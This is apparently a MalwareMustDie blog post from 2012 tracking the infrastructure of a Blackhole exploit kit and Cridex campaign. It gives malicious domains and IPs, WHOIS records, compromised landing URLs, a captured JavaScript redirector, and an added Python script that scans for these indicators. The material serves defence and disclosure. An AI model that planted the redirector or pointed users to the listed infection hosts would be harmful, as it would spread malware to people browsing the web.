Our past three incidents of spam leading to BlackHole (BHEK) and the Trojan Cridex (see the posts at the URLs below):

http://malwaremustdie.blogspot.jp/2012/11/full-disclosure-analysis-fake-facebook.html
http://malwaremustdie.blogspot.jp/2012/12/spam-wordpress-redirector.html
http://malwaremustdie.blogspot.jp/2012/12/fake-facebook-notification-leads-to.html

were conducted by a cybercrime group with the evil DNS service exposed below. We just spotted that these criminals are continuing the infection & moving their Blackhole2 infector service into the German VPS SECURENETZ-DE, as per the details below:

[PLEASE BLACKLIST THESE!]

ganiopatia.ru A 212.162.52.180
pelamutrika.ru A 212.162.52.180
aliamognoa.ru A 212.162.52.180
ahiontota.ru A 212.162.52.180
anifkailood.ru A 212.162.52.180
genevaonline.ru A 212.162.52.180
podarunoki.ru A 212.162.52.180
aseniakrol.ru A 212.162.52.180
pitoniamason.ru A 212.162.52.180
dimarikanko.ru A 212.162.52.180

ganiopatia.ru A 212.162.56.210
pelamutrika.ru A 212.162.56.210
aliamognoa.ru A 212.162.56.210
ahiontota.ru A 212.162.56.210
anifkailood.ru A 212.162.56.210
genevaonline.ru A 212.162.56.210
podarunoki.ru A 212.162.56.210
aseniakrol.ru A 212.162.56.210
pitoniamason.ru A 212.162.56.210
dimarikanko.ru A 212.162.56.210

NEW DOMAINS in NEW VPS IP ADDRESS:
ahiontota.ru A 212.162.13.230
anifkailood.ru A 212.162.13.230
podarunoki.ru A 212.162.13.230
aseniakrol.ru A 212.162.13.230
pitoniamason.ru A 212.162.13.230
amnaosogo.ru A 212.162.13.230
dimarikanko.ru A 212.162.13.230
aofngppahgor.ru A 212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]

With the below WHOIS details:

inetnum: 212.162.56.0 - 212.162.57.255
netname: SECURENETZ-DE
descr: Secure-Netz
country: de
admin-c: NK1733-RIPE
tech-c: MATT69-RIPE
status: ASSIGNED PA
remarks: all abuse reports to abuse@level3.com
mnt-by: LEVEL3-MNT
mnt-lower: LEVEL3-MNT
source: RIPE # Filtered

person: Matthew Duncalf
address: Level (3) Communications
address: Level 3 House
address: 66 Prescot Street
address: London, E1 8HG UK
phone: +44 20 7961 8468
fax-no: +44 20 7864 0338
nic-hdl: MATT69-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # Filtered

person: Nicole Kuehne
address: Secure-Netz
address: Am Plan 1
address: 37581 Bad Gandersheim
address: Germany
phone: +49 5382 953600
fax-no: +49 5382 953610
nic-hdl: NK1733-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # Filtered

Conrad of the Dynamoo blog also has a reference to this new service (grep for the IPs 212.162.*) -->> [HERE]

Spam Infector Redirection URL List
Below is the PoC from the spam emails' infected URLs, the infector landing pages:

h00p://www.jiaenhospital.com/mail.htm
h00p://www.brsams.com/mail.htm
h00p://sat-tesero.it/mail.htm
h00p://mondoimmobiliare2010.com/mail.htm
h00p://www.fevaweb.org.ar/mail.htm
h00p://www.sddongrun.com/mail.htm
h00p://revolverresine.com/mail.htm
h00p://www.freemusicdownloads.eu/mail.htm
h00p://www.migar.cn/mail.htm
h00p://www.sp3zory.webd.pl/mail.htm
h00p://www.vyborpodarka.ru/mail.htm
h00p://latinchat.ca/mail.htm
h00p://www.templodoaprendiz.com.br/mail.htm
h00p://haxlzxs.com/mail.htm
h00p://azlj365.com/mail.htm
h00p://modaencuba.com/mail.htm
h00p://naohide.com/mail.htm
h00p://ulbakompleks.kz/mail.htm
h00p://www.freelink.com.cn/mail.htm
h00p://www.appchat.cn/mail.htm
h00p://www.abbeyhealthcare.co.uk/mail.htm
h00p://www.kaizer.cn/mail.htm
h00p://www.lkedu8.com/mail.htm
h00p://www.institutogv.com.ar/mail.htm
h00p://mekka-digital.hu/mail.htm

:Log:

$ date
Wed Dec 12 20:00:40 JST 2012

$ Xurl h00p://www.jiaenhospital.com/mail.htm|less
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   422  100   422    0     0     88      0  0:00:04  0:00:04 --:--:--   133

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
</script>
</body>
</html>

$ host -ta aseniakrol.ru
aseniakrol.ru has address 212.162.52.180
aseniakrol.ru has address 212.162.56.210

I hope the authorities will shut down their domains & DNS soon, for these criminals are VERY eager to steal credentials from innocent people on a daily basis. To Secure-Netz, DE: please help to shut down the usage of these domains under your VPS immediately.
#MalwareMustDie
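The landing page above is a plain JavaScript redirector: a constant comparison that is always true hands the browser over to the BHEK host on port 8080. As an added example (not part of the original post or of MalwareMustDie's tooling), the script below turns the "domain A ip" blocklist from the post into a lookup set, pulls the script-driven redirect target out of the quoted landing page and checks whether it lands on a listed domain, and then scans a few constructed BIND-style query log lines for clients that resolved any of the listed domains or their subdomains. The indicator lines are a subset copied from the post; the log lines, client addresses and the `h00p` refanging rule are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Subset of the indicator lines from the post, including the annotated ones,
# to show that trailing notes after the A record are tolerated by the parser.
IOC_RECORDS = """
ganiopatia.ru A 212.162.52.180
pelamutrika.ru A 212.162.52.180
aseniakrol.ru A 212.162.52.180
aseniakrol.ru A 212.162.56.210
ahiontota.ru A 212.162.13.230 NEW DOMAINS in NEW VPS IP ADDRESS
aofngppahgor.ru A 212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]
"""

# Landing page as quoted in the post ("h00p" is the post's defanging of "http").
LANDING_PAGE = """<html><head><title>Please wait</title></head><body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
</script>
</body></html>"""

# Constructed BIND query-log lines (not from the post) for the log scan.
SAMPLE_DNS_LOG = """
12-Dec-2012 20:00:40.123 queries: info: client 10.0.0.5#53211: query: aseniakrol.ru IN A + (10.0.0.1)
12-Dec-2012 20:00:41.456 queries: info: client 10.0.0.7#40112: query: www.example.com IN A + (10.0.0.1)
12-Dec-2012 20:00:42.789 queries: info: client 10.0.0.9#51234: query: www.aseniakrol.ru IN A + (10.0.0.1)
"""

IOC_LINE_RE = re.compile(r"^\s*([a-z0-9.-]+)\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})", re.I)
# Matches document.location / window.location(.href) = "..." assignments.
REDIRECT_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)
DNS_QUERY_RE = re.compile(r"client (\S+?)#\d+: query: (\S+) IN ")


def parse_ioc_records(text):
    """Return (domains, ips) sets from 'domain A ip' lines; other lines are ignored."""
    domains, ips = set(), set()
    for line in text.splitlines():
        m = IOC_LINE_RE.match(line)
        if m:
            domains.add(m.group(1).lower())
            ips.add(m.group(2))
    return domains, ips


def refang(url):
    """Turn the post's h00p:// (and the common hxxp://) back into http:// for parsing."""
    return re.sub(r"^h(?:00|xx)p(s?)://", r"http\1://", url, flags=re.I)


def extract_js_redirects(html):
    """Collect every script-assigned location target found in the page."""
    return [refang(raw) for raw in REDIRECT_RE.findall(html)]


def classify_landing_page(html, bad_domains):
    """Split each redirect target and flag hosts present in the blocklist."""
    findings = []
    for url in extract_js_redirects(html):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        findings.append({
            "url": url,
            "host": host,
            "port": parts.port,
            "path": parts.path,
            "known_bad": host in bad_domains,
        })
    return findings


def scan_dns_log(log_text, bad_domains):
    """Return (client, qname) pairs whose qname is a listed domain or a subdomain of one."""
    hits = []
    for line in log_text.splitlines():
        m = DNS_QUERY_RE.search(line)
        if not m:
            continue
        client, qname = m.group(1), m.group(2).rstrip(".").lower()
        if qname in bad_domains or any(qname.endswith("." + d) for d in bad_domains):
            hits.append((client, qname))
    return hits


if __name__ == "__main__":
    domains, ips = parse_ioc_records(IOC_RECORDS)
    for f in classify_landing_page(LANDING_PAGE, domains):
        print("redirect ->", f)
    for client, qname in scan_dns_log(SAMPLE_DNS_LOG, domains):
        print("DNS hit:", client, "resolved", qname)
```

The blocklist parser keys on the `domain A ip` shape so the annotated lines in the post can be pasted in unchanged; the DNS scan also matches subdomains, because a redirector family that rotates hosts under one registered domain would otherwise slip past an exact-name check.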